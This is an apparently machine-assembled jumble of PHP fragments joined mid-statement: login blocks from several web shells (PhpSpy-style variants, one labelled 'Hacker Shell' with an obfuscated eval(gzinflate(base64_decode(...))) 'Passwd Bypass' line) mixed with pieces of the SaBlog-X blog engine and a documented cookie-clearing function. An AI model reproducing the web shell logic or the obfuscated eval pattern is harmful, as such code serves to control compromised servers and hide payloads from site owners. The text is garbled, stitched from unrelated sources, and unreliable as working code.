if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-1"); } if ($haz == "logout") { scookie('godssid', '', -86400 * 365); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } if ($admin['check']) { $password = md5($password); if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('godssid', $password); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } } if ($_COOKIE['godssid']) { if ($_COOKIE['godssid'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } $errmsg = ''; if ($haz == 'phpinfo') {
} elseif ($charset == 'eucjpms') { header("content-Type: text/html; charset=euc-jp"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== 身份验证 =====================*/ if ($action == "logout") { scookie('loginpass', '', -86400 * 365); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } if ($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == md5($password)) { scookie('loginpass', md5($password)); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } } if ($_COOKIE['loginpass']) { if ($_COOKIE['loginpass'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== 验证结束 =====================*/ $errmsg = '';
header("content-Type: text/html; charset=euc-kr"); } elseif ($charset == 'euc-jp') { header("content-Type: text/html; charset=euc-jp"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== 韬唤楠岃瘉 =====================*/ if ($action == "logout") { scookie('loginpass', '', -86400 * 365); @header('Location: ' . $self); exit; } if ($pass) { if ($action == 'login') { if ($pass == encode_pass($password)) { scookie('loginpass', encode_pass($password)); @header('Location: ' . $self); exit; } } if ($_COOKIE['loginpass']) { if ($_COOKIE['loginpass'] != $pass) { loginpage(); } } else { loginpage(); } } /*===================== 楠岃瘉缁撴潫 =====================*/ $errmsg = ''; !$action && ($action = 'file');
} elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== 身份验证 =====================*/ if ($action == "logout") { scookie('phpspypass', '', -86400 * 365); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } if ($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('phpspypass', $password); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } } if ($_COOKIE['phpspypass']) { if ($_COOKIE['phpspypass'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== 验证结束 =====================*/ $errmsg = '';
header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); if ($action == "logout") { scookie('kyobin', '', -86400 * 365); p('<meta http-equiv="refresh" content="0;URL=' . $self . '">'); p('<body background=black>'); exit; } if ($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('kyobin', $password); //Passwd Bypass Read eval(gzinflate(base64_decode('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'))); p('<meta http-equiv="refresh" content="2;URL=' . $self . '">'); p('<body bgcolor=black> <BR><BR><div align=center><font color=yellow face=tahoma size=2>Hacker Shell - Yukleniyor..<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>'); exit; } else { $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>'; echo $err_mess; } } if ($_COOKIE['kyobin']) { if ($_COOKIE['kyobin'] != $admin['pass']) { loginpage(); }
${'p' . $i} = isset($P['p' . $i]) ? $P['p' . $i] : ''; } if (isset($charsetdb[$charset])) { header("content-Type: text/html; charset=" . $charset); } $timestamp = time(); /* 身份验证 */ if ($act == "logout") { scookie('loginpass', '', -86400 * 365); @header('Location: ' . SELF); exit; } if ($pass) { if ($act == 'login') { if ($pass == encode_pass($P['password'])) { scookie('loginpass', encode_pass($P['password'])); @header('Location: ' . SELF); exit; } } if (isset($_COOKIE['loginpass'])) { if ($_COOKIE['loginpass'] != $pass) { loginpage(); } } else { loginpage(); } } /* 验证结束 */ $errmsg = ''; $uchar = '▲';
$article['allowread'] = 0; } else { $article['allowread'] = 1; if ($article['attachments']) { $haveattach = 1; } if ($article['description']) { $article['content'] = $article['description']; } } $articledb[$article['articleid']] = $article; } unset($article); $DB->free_result($query); //设置一个时间戳,一定时间内该时间戳有效.用于COOKIE防盗链 scookie('viewarticle', $timestamp); $metadb = array(); if ($aids) { $query = $DB->query("SELECT m.mid, m.name, m.slug, m.type, r.cid FROM {$db_prefix}metas m\r\n\t\t\tINNER JOIN {$db_prefix}relationships r ON r.mid = m.mid\r\n\t\t\tWHERE m.type IN ('category', 'tag') AND r.cid IN ({$aids})\r\n\t\t\tORDER BY m.displayorder ASC, m.mid DESC"); while ($meta = $DB->fetch_array($query)) { if ($meta['type'] == 'tag') { $meta['url'] = gettaglink($meta['slug']); $articledb[$meta['cid']]['content'] = highlight_tag($articledb[$meta['cid']]['content'], $meta['name']); } else { $meta['url'] = getcatelink($meta['mid'], $meta['slug']); } $metadb[$meta['cid']][$meta['type']][] = $meta; } unset($meta); $DB->free_result($query); if ($haveattach) {
} $username = char_cv($username); $r = $DB->fetch_one_array("SELECT userid FROM {$db_prefix}users WHERE username='******' LIMIT 1"); if ($r['userid']) { redirect('该用户名已被注册.'); } $email = char_cv($email); $r = $DB->fetch_one_array("SELECT userid FROM {$db_prefix}users WHERE email='{$email}' LIMIT 1"); if ($r['userid']) { redirect('该E-mail已被注册.'); } $password = md5($password); $DB->query("INSERT INTO {$db_prefix}users (username, password, logincount, loginip, logintime, email, url, regdateline, regip, groupid, lastip, lastvisit, lastactivity) VALUES ('{$username}', '{$password}', '1', '{$onlineip}', '{$timestamp}', '{$email}', '{$url}', '{$timestamp}', '{$onlineip}', '3', '{$onlineip}', '{$timestamp}', '{$timestamp}')"); $sax_uid = $DB->insert_id(); //保存COOKIE scookie('sax_auth', authcode("{$sax_uid}\t{$password}\t1"), $login_life); //更新数据库中的登陆会话 updatesession(); redirect('注册成功.', $options['url']); } //登陆状态检测 if (!$sax_uid || !$sax_pw || !$sax_logincount) { loginpage(); } else { $r = $DB->fetch_one_array("SELECT userid, password, logincount FROM {$db_prefix}users WHERE userid='{$sax_uid}'"); if (!$r) { loginpage(); } if ($sax_pw != $r['password']) { loginpage(); }
message('该评论已存在'); } $DB->query("INSERT INTO {$db_prefix}comments (comment_parent, articleid, author, email, url, dateline, content, ipaddress, visible) VALUES ('{$comment_parent}', '{$articleid}', '{$username}', '{$email}', '{$url}', '{$timestamp}', '{$content}', '{$onlineip}', '{$visible}')"); $cmid = $DB->insert_id(); if ($sax_uid) { $DB->unbuffered_query("UPDATE {$db_prefix}users SET lastpost='{$timestamp}' WHERE userid='{$sax_uid}'"); // 更新用户最后发表时间 } if (!$spam) { // 如果不是垃圾则更新当前文章评论数 $DB->unbuffered_query("UPDATE {$db_prefix}articles SET comments=comments+1 WHERE articleid='{$articleid}'"); $DB->unbuffered_query("UPDATE {$db_prefix}statistics SET comment_count=comment_count+1"); newcomments_recache(); statistics_recache(); } scookie('comment_post_time', $timestamp); // 跳转到最新发表的评论 if ($comment_parent) { $gocommentid = get_comment_parent($comment_parent); } else { $gocommentid = $cmid; } $cmnum = '#cm' . $gocommentid; $article_comment_num = (int) $options['article_comment_num']; if ($article_comment_num) { $cpost = $DB->result($DB->query("SELECT COUNT(commentid) FROM {$db_prefix}comments WHERE articleid='{$articleid}' AND visible='1' AND commentid<='{$gocommentid}' AND comment_parent='0'"), 0); if ($cpost / $article_comment_num <= 1) { $page = 1; } else { $page = @ceil($cpost / $article_comment_num); $article['url'] = redirect_permalink($articleid, $article['alias'], $page);
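/**
 * Expire cookies and, when clearing everything, reset the login globals.
 *
 * With a non-empty $key only that cookie is expired. If PHP parsed it into an
 * array (the client sent names of the form "key[index]"), each element is
 * expired under its bracketed name, because that is the name the browser
 * actually stores. With no $key, every cookie in $_COOKIE is expired the same
 * way and $sax_uid / $sax_user / $sax_pw are reset for the rest of the request.
 *
 * This function only asks the browser to discard cookies. Nothing in it
 * invalidates server-side state, so a cookie value copied before the call is
 * not revoked here.
 *
 * Only one level of array nesting is handled, in both branches.
 *
 * @param string $key Cookie name to expire; '' (the default) expires all cookies.
 * @return void
 */
function dcookies($key = '')
{
    global $sax_uid, $sax_user, $sax_pw;

    // Same negative lifetime the callers have always passed to scookie();
    // presumably an offset from "now" - confirm against scookie().
    $expired = -86400 * 365;

    if ($key) {
        // isset() guard: the caller may name a cookie the client never sent,
        // which would otherwise raise an undefined-index notice/warning.
        if (isset($_COOKIE[$key]) && is_array($_COOKIE[$key])) {
            foreach (array_keys($_COOKIE[$key]) as $index) {
                scookie($key . '[' . $index . ']', '', $expired);
            }
        } else {
            scookie($key, '', $expired);
        }
        return;
    }

    if (is_array($_COOKIE)) {
        foreach ($_COOKIE as $name => $value) {
            if (is_array($value)) {
                // An array-valued entry is really several cookies named
                // "name[index]"; expiring the bare name would leave them all
                // in the browser after a "clear everything" call.
                foreach (array_keys($value) as $index) {
                    scookie($name . '[' . $index . ']', '', $expired);
                }
            } else {
                scookie($name, '', $expired);
            }
        }
    }

    // Drop the in-memory identity so the remainder of this request runs as a guest.
    $sax_uid = 0;
    $sax_user = $sax_pw = '';
}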
"> <title>Refresh Limitation Enabled</title> </head> <body style="table-layout:fixed; word-break:break-all"> <center> <div style="margin-top:100px;background-color:#f1f1f1;text-align:center;width:600px;padding:20px;margin-right: auto;margin-left: auto;font-family: Verdana, Tahoma; color: #666666; font-size: 12px"> <p><strong>Refresh Limitation Enabled</strong></p> <p>The time between your two requests is smaller than 2 seconds, please do NOT refresh and wait for automatical forwarding ...</p> </div> </center> </body> </html> <?php exit; } scookie('lastrequest', $timestamp . "\t" . $REQUEST_URI); } if (($attackevasive == 2 || $attackevasive == 3) && ($_SERVER['HTTP_X_FORWARDED_FOR'] || $_SERVER['HTTP_VIA'] || $_SERVER['HTTP_PROXY_CONNECTION'] || $_SERVER['HTTP_USER_AGENT_VIA'])) { ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Proxy Connection Denied</title> </head> <body style="table-layout:fixed; word-break:break-all"> <center> <div style="margin-top:100px;background-color:#f1f1f1;text-align:center;width:600px;padding:20px;margin-right: auto;margin-left: auto;font-family: Verdana, Tahoma; color: #666666; font-size: 12px"> <p><strong>Proxy Connection Denied</strong></p> <p>Your request was forbidden due to the administrator has set to deny all proxy connection.</p> </div> </center>
$query = $DB->query("SELECT m.mid, m.name, m.slug, m.type, r.cid FROM {$db_prefix}metas m\r\n\tINNER JOIN {$db_prefix}relationships r ON r.mid = m.mid\r\n\tWHERE m.type IN ('category', 'tag') AND r.cid='" . $article['articleid'] . "'\r\n\tORDER BY m.displayorder ASC, m.mid DESC"); $article['keywords'] = $comma = ''; while ($meta = $DB->fetch_array($query)) { if ($meta['type'] == 'tag') { $meta['url'] = gettaglink($meta['slug']); $article['content'] = highlight_tag($article['content'], $meta['name']); } else { $meta['url'] = getcatelink($meta['mid'], $meta['slug']); } $article['keywords'] .= $comma . $meta['name']; $metadb[$article['articleid']][$meta['type']][] = $meta; $comma = ','; } $DB->free_result($query); if ($_POST['readpassword'] && $article['readpassword'] == sax_addslashes($_POST['readpassword'])) { scookie('readpassword_' . $article['articleid'], sax_addslashes($_POST['readpassword']), 2592000); //一个月 } //设置文章的分类名、作者、TAG、标题成为meta\title信息 if (!$article['keywords']) { $tmp = $comma = ''; if (is_array($catecache) && count($catecache)) { foreach ($catecache as $data) { $tmp .= $comma . $data['name']; $comma = ','; } $options['meta_keywords'] = $tmp; } else { $options['meta_keywords'] = ''; } } else {
// 本文件说明:前台主程序 // --------------------------------------------------------------// // 本程序作者:angel // --------------------------------------------------------------// // 本程序版本:SaBlog-X Ver 2.0 // --------------------------------------------------------------// // 本程序主页:http://www.sablog.net // ==============================================================// require_once 'global.php'; //require_once(SABLOG_ROOT.'include/query.inc.php'); !$action && ($action = 'article'); //清除浏览文章记录 if ($_GET['action'] == 'clearalready') { if (is_array($_COOKIE['articleids'])) { foreach ($_COOKIE['articleids'] as $key => $value) { scookie("articleids[" . $key . "]", ''); } } message('已经删除浏览过的文章记录', $referer); } $page = $maxpages && $page > $maxpages ? 1 : $page; $moduledb = array('article', 'show', 'tagslist', 'archives', 'links'); if (in_array($action, $moduledb)) { $archivenum = count($archivecache); //前台显示12个归档就可以了.显示那么多干嘛? if ($archivenum > 12) { $archivecache = array_slice($archivecache, 0, 12); } $module = loadmodule($action); } else { message('未知模块');